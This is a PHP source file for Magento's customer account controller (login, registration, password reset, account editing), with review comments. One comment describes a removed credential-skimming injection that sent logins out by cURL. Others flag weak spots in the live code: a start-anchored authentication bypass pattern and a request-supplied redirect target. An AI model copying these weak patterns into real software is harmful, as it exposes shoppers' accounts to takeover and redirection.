- <?php
- /**
- * Magento
- *
- * NOTICE OF LICENSE
- *
- * This source file is subject to the Open Software License (OSL 3.0)
- * that is bundled with this package in the file LICENSE.txt.
- * It is also available through the world-wide-web at this URL:
- * http://opensource.org/licenses/osl-3.0.php
- * If you did not receive a copy of the license and are unable to
- * obtain it through the world-wide-web, please send an email
- * to license@magento.com so we can send you a copy immediately.
- *
- * DISCLAIMER
- *
- * Do not edit or add to this file if you wish to upgrade Magento to newer
- * versions in the future. If you wish to customize Magento for your
- * needs please refer to http://www.magento.com for more information.
- *
- * @category Mage
- * @package Mage_Customer
- * @copyright Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
- * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
- */
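/**
 * Customer account controller
 *
 * Front-end actions for customer login, logout, registration, e-mail
 * confirmation, password reset and account editing.
 *
 * @category Mage
 * @package Mage_Customer
 * @author Magento Core Team <core@magentocommerce.com>
 */
class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
{
    /**
     * Action list where need check enabled cookie
     *
     * @var array
     */
    protected $_cookieCheckActions = array('loginPost', 'createpost');

    /**
     * Retrieve customer session model object
     *
     * @return Mage_Customer_Model_Session
     */
    protected function _getSession()
    {
        return Mage::getSingleton('customer/session');
    }

    /**
     * Action predispatch
     *
     * Check customer authentication for some actions. An action is treated as
     * "open" (no authentication required) when its name STARTS WITH one of the
     * entries in $openActions, compared case-insensitively.
     *
     * NOTE(review): the pattern is anchored only at the start, so any action
     * whose name merely begins with an open name (for example a future
     * "loginAsSomething") is also reachable without authentication. New
     * actions added to this controller must be named with that in mind.
     *
     * @return void
     */
    public function preDispatch()
    {
        // a brute-force protection here would be nice
        parent::preDispatch();

        if (!$this->getRequest()->isDispatched()) {
            return;
        }

        $action = $this->getRequest()->getActionName();
        $openActions = array(
            'create',
            'login',
            'logoutsuccess',
            'forgotpassword',
            'forgotpasswordpost',
            'resetpassword',
            'resetpasswordpost',
            'confirm',
            'confirmation'
        );
        $pattern = '/^(' . implode('|', $openActions) . ')/i';

        if (!preg_match($pattern, $action)) {
            // Protected action: stop dispatching when the session is not authenticated.
            if (!$this->_getSession()->authenticate($this)) {
                $this->setFlag('', 'no-dispatch', true);
            }
        } else {
            $this->_getSession()->setNoReferer(true);
        }
    }

    /**
     * Action postdispatch
     *
     * Remove No-referer flag from customer session after each action
     *
     * @return void
     */
    public function postDispatch()
    {
        parent::postDispatch();
        $this->_getSession()->unsNoReferer(false);
    }

    /**
     * Default customer account page
     *
     * @return void
     */
    public function indexAction()
    {
        $this->loadLayout();
        $this->_initLayoutMessages('customer/session');
        $this->_initLayoutMessages('catalog/session');

        $this->getLayout()->getBlock('content')->append(
            $this->getLayout()->createBlock('customer/account_dashboard')
        );
        $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
        $this->renderLayout();
    }

    /**
     * Customer login form page
     *
     * Redirects to the account index when the customer is already logged in.
     *
     * @return void
     */
    public function loginAction()
    {
        if ($this->_getSession()->isLoggedIn()) {
            $this->_redirect('*/*/');
            return;
        }
        $this->getResponse()->setHeader('Login-Required', 'true');
        $this->loadLayout();
        $this->_initLayoutMessages('customer/session');
        $this->_initLayoutMessages('catalog/session');
        $this->renderLayout();
    }

    /**
     * Login post action
     *
     * Validates the form key, attempts the login with the posted
     * login[username] / login[password] pair, stores any error message in the
     * session and finally redirects via _loginPostRedirect().
     *
     * The submitted credentials are passed to $session->login() only. They must
     * never be written to a log, mailed, or placed in an outbound request.
     *
     * @return void
     */
    public function loginPostAction()
    {
        if (!$this->_validateFormKey()) {
            $this->_redirect('*/*/');
            return;
        }

        if ($this->_getSession()->isLoggedIn()) {
            $this->_redirect('*/*/');
            return;
        }
        $session = $this->_getSession();

        if ($this->getRequest()->isPost()) {
            $login = $this->getRequest()->getPost('login');
            if (!empty($login['username']) && !empty($login['password'])) {
                try {
                    $session->login($login['username'], $login['password']);
                    if ($session->getCustomer()->getIsJustConfirmed()) {
                        $this->_welcomeCustomer($session->getCustomer(), true);
                    }
                } catch (Mage_Core_Exception $e) {
                    switch ($e->getCode()) {
                        case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
                            $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
                            $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
                            break;
                        case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
                            $message = $e->getMessage();
                            break;
                        default:
                            $message = $e->getMessage();
                    }
                    $session->addError($message);
                    $session->setUsername($login['username']);
                } catch (Exception $e) {
                    // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
                }
            } else {
                $session->addError($this->__('Login and password are required.'));
            }
        }

        // NOTE(review): the pasted copy of this file carried an injected block at
        // this point that collected the submitted username and password together
        // with the client IP and host name, performed a plain-HTTP geolocation
        // lookup, and sent the result out with cURL with TLS verification
        // disabled. It is not part of this controller and has been removed.
        // Outbound network calls inside a login action are an indicator of
        // compromise: compare the deployed file against the vendor release and
        // treat credentials submitted while it was present as exposed.

        $this->_loginPostRedirect();
    }

    /**
     * Define target URL and redirect customer after logging in
     *
     * The referer taken from the request is only used when _isUrlInternal()
     * accepts it, so the redirect target stays on this store.
     *
     * @return void
     */
    protected function _loginPostRedirect()
    {
        $session = $this->_getSession();

        if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
            // Set default URL to redirect customer to
            $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
            // Redirect customer to the last page visited after logging in
            if ($session->isLoggedIn()) {
                if (!Mage::getStoreConfigFlag(
                    Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
                )) {
                    $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
                    if ($referer) {
                        // Rebuild referer URL to handle the case when SID was changed
                        $referer = $this->_getModel('core/url')
                            ->getRebuiltUrl($this->_getHelper('core')->urlDecodeAndEscape($referer));
                        if ($this->_isUrlInternal($referer)) {
                            $session->setBeforeAuthUrl($referer);
                        }
                    }
                } else if ($session->getAfterAuthUrl()) {
                    $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
                }
            } else {
                $session->setBeforeAuthUrl($this->_getHelper('customer')->getLoginUrl());
            }
        } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
            $session->setBeforeAuthUrl($this->_getHelper('customer')->getDashboardUrl());
        } else {
            if (!$session->getAfterAuthUrl()) {
                $session->setAfterAuthUrl($session->getBeforeAuthUrl());
            }
            if ($session->isLoggedIn()) {
                $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
            }
        }
        $this->_redirectUrl($session->getBeforeAuthUrl(true));
    }

    /**
     * Customer logout action
     *
     * Logs the customer out, renews the session and redirects to the
     * logout-success page.
     *
     * @return void
     */
    public function logoutAction()
    {
        $this->_getSession()->logout()
            ->renewSession();

        $this->_redirect('*/*/logoutSuccess');
    }

    /**
     * Logout success page
     *
     * @return void
     */
    public function logoutSuccessAction()
    {
        $this->loadLayout();
        $this->renderLayout();
    }

    /**
     * Customer register form page
     *
     * @return void
     */
    public function createAction()
    {
        if ($this->_getSession()->isLoggedIn()) {
            $this->_redirect('*/*');
            return;
        }

        $this->loadLayout();
        $this->_initLayoutMessages('customer/session');
        $this->renderLayout();
    }

    /**
     * Create customer account action
     *
     * Validates the posted registration data, saves the customer and hands over
     * to _successProcessRegistration(). On any error the posted form data and
     * the error messages are kept in the session and the customer is sent back
     * to the registration form.
     *
     * @return void
     */
    public function createPostAction()
    {
        /** @var $session Mage_Customer_Model_Session */
        $session = $this->_getSession();
        if ($session->isLoggedIn()) {
            $this->_redirect('*/*/');
            return;
        }
        $session->setEscapeMessages(true); // prevent XSS injection in user input
        if (!$this->getRequest()->isPost()) {
            $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
            $this->_redirectError($errUrl);
            return;
        }

        $customer = $this->_getCustomer();

        try {
            $errors = $this->_getCustomerErrors($customer);

            if (empty($errors)) {
                $customer->cleanPasswordsValidationData();
                $customer->save();
                $this->_dispatchRegisterSuccess($customer);
                $this->_successProcessRegistration($customer);
                return;
            } else {
                $this->_addSessionError($errors);
            }
        } catch (Mage_Core_Exception $e) {
            $session->setCustomerFormData($this->getRequest()->getPost());
            if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
                $url = $this->_getUrl('customer/account/forgotpassword');
                $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
                // Escaping is switched off only for this fixed message, which contains a link.
                $session->setEscapeMessages(false);
            } else {
                $message = $e->getMessage();
            }
            $session->addError($message);
        } catch (Exception $e) {
            $session->setCustomerFormData($this->getRequest()->getPost())
                ->addException($e, $this->__('Cannot save the customer.'));
        }
        $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
        $this->_redirectError($errUrl);
    }

    /**
     * Success Registration
     *
     * When confirmation is required, sends the confirmation e-mail and redirects
     * to the account index; otherwise logs the customer in and redirects to the
     * URL returned by _welcomeCustomer().
     *
     * @param Mage_Customer_Model_Customer $customer
     * @return Mage_Customer_AccountController
     */
    protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
    {
        $session = $this->_getSession();
        if ($customer->isConfirmationRequired()) {
            /** @var $app Mage_Core_Model_App */
            $app = $this->_getApp();
            /** @var $store Mage_Core_Model_Store */
            $store = $app->getStore();
            $customer->sendNewAccountEmail(
                'confirmation',
                $session->getBeforeAuthUrl(),
                $store->getId()
            );
            $customerHelper = $this->_getHelper('customer');
            $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
                $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
            $url = $this->_getUrl('*/*/index', array('_secure' => true));
        } else {
            $session->setCustomerAsLoggedIn($customer);
            $url = $this->_welcomeCustomer($customer);
        }
        $this->_redirectSuccess($url);
        return $this;
    }

    /**
     * Get Customer Model
     *
     * Returns the customer stored in the registry under 'current_customer', or a
     * new customer model when none is registered.
     *
     * @return Mage_Customer_Model_Customer
     */
    protected function _getCustomer()
    {
        $customer = $this->_getFromRegistry('current_customer');
        if (!$customer) {
            $customer = $this->_getModel('customer/customer')->setId(null);
        }
        if ($this->getRequest()->getParam('is_subscribed', false)) {
            $customer->setIsSubscribed(1);
        }
        /**
         * Initialize customer group id
         */
        $customer->getGroupId();

        return $customer;
    }

    /**
     * Add session error method
     *
     * Keeps the posted form data in the session and adds each error message;
     * a non-array argument is replaced by a generic message.
     *
     * @param string|array $errors
     * @return void
     */
    protected function _addSessionError($errors)
    {
        $session = $this->_getSession();
        $session->setCustomerFormData($this->getRequest()->getPost());
        if (is_array($errors)) {
            foreach ($errors as $errorMessage) {
                $session->addError($errorMessage);
            }
        } else {
            $session->addError($this->__('Invalid customer data'));
        }
    }

    /**
     * Validate customer data and return errors if they are
     *
     * @param Mage_Customer_Model_Customer $customer
     * @return array|string
     */
    protected function _getCustomerErrors($customer)
    {
        $errors = array();
        $request = $this->getRequest();
        if ($request->getPost('create_address')) {
            $errors = $this->_getErrorsOnCustomerAddress($customer);
        }
        $customerForm = $this->_getCustomerForm($customer);
        $customerData = $customerForm->extractData($request);
        $customerErrors = $customerForm->validateData($customerData);
        if ($customerErrors !== true) {
            $errors = array_merge($customerErrors, $errors);
        } else {
            // Form data is valid: copy it onto the customer, then validate the password pair.
            $customerForm->compactData($customerData);
            $customer->setPassword($request->getPost('password'));
            $customer->setPasswordConfirmation($request->getPost('confirmation'));
            $customerErrors = $customer->validate();
            if (is_array($customerErrors)) {
                $errors = array_merge($customerErrors, $errors);
            }
        }
        return $errors;
    }

    /**
     * Get Customer Form Initialized Model
     *
     * @param Mage_Customer_Model_Customer $customer
     * @return Mage_Customer_Model_Form
     */
    protected function _getCustomerForm($customer)
    {
        /* @var $customerForm Mage_Customer_Model_Form */
        $customerForm = $this->_getModel('customer/form');
        $customerForm->setFormCode('customer_account_create');
        $customerForm->setEntity($customer);
        return $customerForm;
    }

    /**
     * Get Helper
     *
     * @param string $path
     * @return Mage_Core_Helper_Abstract
     */
    protected function _getHelper($path)
    {
        return Mage::helper($path);
    }

    /**
     * Get App
     *
     * @return Mage_Core_Model_App
     */
    protected function _getApp()
    {
        return Mage::app();
    }

    /**
     * Dispatch Event
     *
     * Fires 'customer_register_success' with this controller and the customer.
     *
     * @param Mage_Customer_Model_Customer $customer
     * @return void
     */
    protected function _dispatchRegisterSuccess($customer)
    {
        Mage::dispatchEvent('customer_register_success',
            array('account_controller' => $this, 'customer' => $customer)
        );
    }

    /**
     * Build the registration address from the request, attach it to the customer
     * and return its validation errors
     *
     * @param Mage_Customer_Model_Customer $customer
     * @return array $errors
     */
    protected function _getErrorsOnCustomerAddress($customer)
    {
        $errors = array();
        /* @var $address Mage_Customer_Model_Address */
        $address = $this->_getModel('customer/address');
        /* @var $addressForm Mage_Customer_Model_Form */
        $addressForm = $this->_getModel('customer/form');
        $addressForm->setFormCode('customer_register_address')
            ->setEntity($address);

        $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
        $addressErrors = $addressForm->validateData($addressData);
        if (is_array($addressErrors)) {
            $errors = array_merge($errors, $addressErrors);
        }
        $address->setId(null)
            ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
            ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
        $addressForm->compactData($addressData);
        $customer->addAddress($address);

        $addressErrors = $address->validate();
        if (is_array($addressErrors)) {
            $errors = array_merge($errors, $addressErrors);
        }
        return $errors;
    }

    /**
     * Get model by path
     *
     * @param string $path
     * @param array|null $arguments
     * @return false|Mage_Core_Model_Abstract
     */
    public function _getModel($path, $arguments = array())
    {
        return Mage::getModel($path, $arguments);
    }

    /**
     * Get model from registry by path
     *
     * @param string $path
     * @return mixed
     */
    protected function _getFromRegistry($path)
    {
        return Mage::registry($path);
    }

    /**
     * Add welcome message and send new account email.
     * Returns success URL
     *
     * @param Mage_Customer_Model_Customer $customer
     * @param bool $isJustConfirmed
     * @return string
     */
    protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
    {
        $this->_getSession()->addSuccess(
            $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
        );
        if ($this->_isVatValidationEnabled()) {
            // Show corresponding VAT message to customer
            $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
            $userPrompt = '';
            switch ($configAddressType) {
                case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
                    $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
                        $this->_getUrl('customer/address/edit'));
                    break;
                default:
                    $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
                        $this->_getUrl('customer/address/edit'));
            }
            $this->_getSession()->addSuccess($userPrompt);
        }

        $customer->sendNewAccountEmail(
            $isJustConfirmed ? 'confirmed' : 'registered',
            '',
            Mage::app()->getStore()->getId()
        );

        $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
        if ($this->_getSession()->getBeforeAuthUrl()) {
            $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
        }
        return $successUrl;
    }

    /**
     * Confirm customer account by id and confirmation key
     *
     * Any existing login is ended first. Every failure is reported to the
     * customer through a session error and a redirect to the account index.
     *
     * @return void
     */
    public function confirmAction()
    {
        $session = $this->_getSession();
        if ($session->isLoggedIn()) {
            $this->_getSession()->logout()->regenerateSessionId();
        }
        try {
            $id = $this->getRequest()->getParam('id', false);
            $key = $this->getRequest()->getParam('key', false);
            $backUrl = $this->getRequest()->getParam('back_url', false);
            if (empty($id) || empty($key)) {
                throw new Exception($this->__('Bad request.'));
            }

            // load customer by id (try/catch in case if it throws exceptions)
            try {
                $customer = $this->_getModel('customer/customer')->load($id);
                if ((!$customer) || (!$customer->getId())) {
                    throw new Exception('Failed to load customer by id.');
                }
            } catch (Exception $e) {
                throw new Exception($this->__('Wrong customer account specified.'));
            }

            // check if it is inactive
            if ($customer->getConfirmation()) {
                if ($customer->getConfirmation() !== $key) {
                    throw new Exception($this->__('Wrong confirmation key.'));
                }

                // activate customer
                try {
                    $customer->setConfirmation(null);
                    $customer->save();
                } catch (Exception $e) {
                    throw new Exception($this->__('Failed to confirm customer account.'));
                }

                // log in and send greeting email, then die happy
                $session->setCustomerAsLoggedIn($customer);
                $successUrl = $this->_welcomeCustomer($customer, true);
                // NOTE(review): $backUrl comes from the request; this relies on
                // _redirectSuccess() (defined in the parent, not shown here) to
                // keep the target on this store — confirm.
                $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
                return;
            }

            // die happy
            $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
            return;
        } catch (Exception $e) {
            // die unhappy
            $this->_getSession()->addError($e->getMessage());
            $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
            return;
        }
    }

    /**
     * Send confirmation link to specified email
     *
     * With a posted e-mail address the confirmation e-mail is (re)sent when the
     * account still needs confirmation; without one the request form is shown.
     *
     * @return void
     */
    public function confirmationAction()
    {
        $customer = $this->_getModel('customer/customer');
        if ($this->_getSession()->isLoggedIn()) {
            $this->_redirect('*/*/');
            return;
        }

        // try to confirm by email
        $email = $this->getRequest()->getPost('email');
        if ($email) {
            try {
                $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
                if (!$customer->getId()) {
                    throw new Exception('');
                }
                if ($customer->getConfirmation()) {
                    $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
                    $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
                } else {
                    $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
                }
                $this->_getSession()->setUsername($email);
                $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
            } catch (Exception $e) {
                $this->_getSession()->addException($e, $this->__('Wrong email.'));
                $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
            }
            return;
        }

        // output form
        $this->loadLayout();

        $this->getLayout()->getBlock('accountConfirmation')
            ->setEmail($this->getRequest()->getParam('email', $email));

        $this->_initLayoutMessages('customer/session');
        $this->renderLayout();
    }

    /**
     * Get Url method
     *
     * @param string $url
     * @param array $params
     * @return string
     */
    protected function _getUrl($url, $params = array())
    {
        return Mage::getUrl($url, $params);
    }

    /**
     * Forgot customer password page
     *
     * @return void
     */
    public function forgotPasswordAction()
    {
        $this->loadLayout();

        $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
            $this->_getSession()->getForgottenEmail()
        );
        $this->_getSession()->unsForgottenEmail();

        $this->_initLayoutMessages('customer/session');
        $this->renderLayout();
    }

    /**
     * Forgot customer password action
     *
     * Issues a new reset token and sends the reset e-mail when an account exists
     * for the posted address. The success message is the same whether or not an
     * account was found.
     *
     * @return void
     */
    public function forgotPasswordPostAction()
    {
        $email = (string) $this->getRequest()->getPost('email');
        if ($email) {
            if (!Zend_Validate::is($email, 'EmailAddress')) {
                $this->_getSession()->setForgottenEmail($email);
                $this->_getSession()->addError($this->__('Invalid email address.'));
                $this->_redirect('*/*/forgotpassword');
                return;
            }

            /** @var $customer Mage_Customer_Model_Customer */
            $customer = $this->_getModel('customer/customer')
                ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
                ->loadByEmail($email);

            if ($customer->getId()) {
                try {
                    $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
                    $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
                    $customer->sendPasswordResetConfirmationEmail();
                } catch (Exception $exception) {
                    $this->_getSession()->addError($exception->getMessage());
                    $this->_redirect('*/*/forgotpassword');
                    return;
                }
            }
            $this->_getSession()
                ->addSuccess($this->_getHelper('customer')
                    ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
                        $this->_getHelper('customer')->escapeHtml($email)));
            $this->_redirect('*/*/');
            return;
        } else {
            $this->_getSession()->addError($this->__('Please enter your email.'));
            $this->_redirect('*/*/forgotpassword');
            return;
        }
    }

    /**
     * Display reset forgotten password form
     *
     * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
     *
     * @return void
     */
    public function resetPasswordAction()
    {
        $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
        $customerId = (int) $this->getRequest()->getQuery('id');
        try {
            $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
            $this->loadLayout();
            // Pass received parameters to the reset forgotten password form
            $this->getLayout()->getBlock('resetPassword')
                ->setCustomerId($customerId)
                ->setResetPasswordLinkToken($resetPasswordLinkToken);
            $this->renderLayout();
        } catch (Exception $exception) {
            $this->_getSession()->addError($this->_getHelper('customer')->__('Your password reset link has expired.'));
            $this->_redirect('*/*/forgotpassword');
        }
    }

    /**
     * Reset forgotten password
     * Used to handle data received from reset forgotten password form
     *
     * The token is validated before anything else; on success the token is
     * cleared so the link cannot be reused.
     *
     * @return void
     */
    public function resetPasswordPostAction()
    {
        $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
        $customerId = (int) $this->getRequest()->getQuery('id');
        $password = (string) $this->getRequest()->getPost('password');
        $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');

        try {
            $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
        } catch (Exception $exception) {
            $this->_getSession()->addError($this->_getHelper('customer')->__('Your password reset link has expired.'));
            $this->_redirect('*/*/');
            return;
        }

        $errorMessages = array();
        if (iconv_strlen($password) <= 0) {
            array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
        }
        /** @var $customer Mage_Customer_Model_Customer */
        $customer = $this->_getModel('customer/customer')->load($customerId);

        $customer->setPassword($password);
        $customer->setPasswordConfirmation($passwordConfirmation);
        $validationErrorMessages = $customer->validate();
        if (is_array($validationErrorMessages)) {
            $errorMessages = array_merge($errorMessages, $validationErrorMessages);
        }

        if (!empty($errorMessages)) {
            $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
            foreach ($errorMessages as $errorMessage) {
                $this->_getSession()->addError($errorMessage);
            }
            $this->_redirect('*/*/resetpassword', array(
                'id' => $customerId,
                'token' => $resetPasswordLinkToken
            ));
            return;
        }

        try {
            // Empty current reset password token i.e. invalidate it
            $customer->setRpToken(null);
            $customer->setRpTokenCreatedAt(null);
            $customer->cleanPasswordsValidationData();
            $customer->save();
            $this->_getSession()->addSuccess($this->_getHelper('customer')->__('Your password has been updated.'));
            $this->_redirect('*/*/login');
        } catch (Exception $exception) {
            $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
            $this->_redirect('*/*/resetpassword', array(
                'id' => $customerId,
                'token' => $resetPasswordLinkToken
            ));
            return;
        }
    }

    /**
     * Check if password reset token is valid
     *
     * Rejects a non-integer or non-positive customer id, an empty token, an
     * unknown customer, a token that does not match the stored one, and an
     * expired token.
     *
     * @param int $customerId
     * @param string $resetPasswordLinkToken
     * @return void
     * @throws Mage_Core_Exception
     */
    protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
    {
        if (!is_int($customerId)
            || !is_string($resetPasswordLinkToken)
            || empty($resetPasswordLinkToken)
            || empty($customerId)
            || $customerId < 0
        ) {
            throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
        }

        /** @var $customer Mage_Customer_Model_Customer */
        $customer = $this->_getModel('customer/customer')->load($customerId);
        if (!$customer || !$customer->getId()) {
            throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
        }

        $customerToken = $customer->getRpToken();
        if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
            throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
        }
    }

    /**
     * Edit customer account information page
     *
     * @return void
     */
    public function editAction()
    {
        $this->loadLayout();
        $this->_initLayoutMessages('customer/session');
        $this->_initLayoutMessages('catalog/session');

        $block = $this->getLayout()->getBlock('customer_edit');
        if ($block) {
            $block->setRefererUrl($this->_getRefererUrl());
        }
        // Re-populate the form with data kept from a previous failed submit, if any.
        $data = $this->_getSession()->getCustomerFormData(true);
        $customer = $this->_getSession()->getCustomer();
        if (!empty($data)) {
            $customer->addData($data);
        }
        if ($this->getRequest()->getParam('changepass') == 1) {
            $customer->setChangePassword(1);
        }

        $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
        $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
        $this->renderLayout();
    }

    /**
     * Save edited account information, optionally changing the password
     *
     * A password change is accepted only when the posted current password
     * hashes to the stored password hash.
     *
     * @return mixed
     */
    public function editPostAction()
    {
        if (!$this->_validateFormKey()) {
            return $this->_redirect('*/*/edit');
        }

        if ($this->getRequest()->isPost()) {
            /** @var $customer Mage_Customer_Model_Customer */
            $customer = $this->_getSession()->getCustomer();

            /** @var $customerForm Mage_Customer_Model_Form */
            $customerForm = $this->_getModel('customer/form');
            $customerForm->setFormCode('customer_account_edit')
                ->setEntity($customer);

            $customerData = $customerForm->extractData($this->getRequest());

            $errors = array();
            $customerErrors = $customerForm->validateData($customerData);
            if ($customerErrors !== true) {
                $errors = array_merge($customerErrors, $errors);
            } else {
                $customerForm->compactData($customerData);
                $errors = array();

                // If password change was requested then add it to common validation scheme
                if ($this->getRequest()->getParam('change_password')) {
                    $currPass = $this->getRequest()->getPost('current_password');
                    $newPass = $this->getRequest()->getPost('password');
                    $confPass = $this->getRequest()->getPost('confirmation');

                    $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
                    if ($this->_getHelper('core/string')->strpos($oldPass, ':')) {
                        list($_salt, $salt) = explode(':', $oldPass);
                    } else {
                        $salt = false;
                    }

                    // Strict comparison: both operands are hash strings, and a loose ==
                    // would compare numeric-looking strings (e.g. "0e...") as numbers.
                    if ($customer->hashPassword($currPass, $salt) === $oldPass) {
                        if (strlen($newPass)) {
                            /**
                             * Set entered password and its confirmation - they
                             * will be validated later to match each other and be of right length
                             */
                            $customer->setPassword($newPass);
                            $customer->setPasswordConfirmation($confPass);
                        } else {
                            $errors[] = $this->__('New password field cannot be empty.');
                        }
                    } else {
                        $errors[] = $this->__('Invalid current password');
                    }
                }

                // Validate account and compose list of errors if any
                $customerErrors = $customer->validate();
                if (is_array($customerErrors)) {
                    $errors = array_merge($errors, $customerErrors);
                }
            }

            if (!empty($errors)) {
                $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
                foreach ($errors as $message) {
                    $this->_getSession()->addError($message);
                }
                $this->_redirect('*/*/edit');
                return $this;
            }

            try {
                $customer->cleanPasswordsValidationData();
                $customer->save();
                $this->_getSession()->setCustomer($customer)
                    ->addSuccess($this->__('The account information has been saved.'));

                $this->_redirect('customer/account');
                return;
            } catch (Mage_Core_Exception $e) {
                $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
                    ->addError($e->getMessage());
            } catch (Exception $e) {
                $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
                    ->addException($e, $this->__('Cannot save the customer.'));
            }
        }

        $this->_redirect('*/*/edit');
    }

    /**
     * Filtering posted data. Converting localized data if needed
     *
     * @param array $data
     * @return array
     */
    protected function _filterPostData($data)
    {
        $data = $this->_filterDates($data, array('dob'));
        return $data;
    }

    /**
     * Check whether VAT ID validation is enabled
     *
     * @param Mage_Core_Model_Store|string|int $store
     * @return bool
     */
    protected function _isVatValidationEnabled($store = null)
    {
        return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
    }
}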